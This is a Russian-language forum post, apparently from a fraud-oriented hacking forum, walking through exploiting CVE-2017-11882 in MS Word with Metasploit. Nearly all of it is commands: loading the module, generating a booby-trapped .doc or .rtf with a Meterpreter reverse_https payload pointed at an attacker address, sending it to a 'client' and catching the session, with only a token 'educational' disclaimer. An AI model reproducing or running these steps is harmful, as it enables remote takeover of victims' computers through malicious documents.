1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

CVE-2017-11882 MS Word Metasploit

Тема в разделе "Linux [OS]", создана пользователем D108, 10 дек 2017.

  1. TopicStarter Overlay
    D108

    D108

    Регистрация:
    26 июл 2017
    Сообщения:
    326
    Симпатии:
    108
    Сегодня речь пойдёт о эксплоите CVE-2017-11882 MS Word Metasploit
    с помощью которого мы будем получать meterpreter сессию с документа MS Word

    Скачаем и перенесём эсплоит
    wget Войти или зарегистрироваться, чтобы увидеть ссылку.

    cp office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

    Запускаем metasploit и выбираем наш модуль.
    service postgresql start
    msfconsole
    use exploit/windows/fileformat/office_ms17_11882

    Задаём путь, куда metasploit сгенерирует нам файл с нагрузкой
    set FILENAME /root/exp.doc
    (Можно поставить и *.rtf, отработает и так и так.)

    Добавляем пейлоад и запускаем
    set payload windows/meterpreter/reverse_https
    set lhost 192.168.0.100 (адрес атакующего)
    set lport 4444(как обычно, можете выбирать почти любой)
    exploit

    Собственно, всё.
    Берём файл, отправляем клиенту (себе на виртуалку, ибо в целях образовательных используем информацию мы).
    Запускаем, ловим сессию.
    [​IMG]
    К сожалению AV так же не стоит на месте
    Войти или зарегистрироваться, чтобы увидеть ссылку.

    P.S.моя первая статья ,не судите строго.
     

Поделиться этой страницей

Загрузка...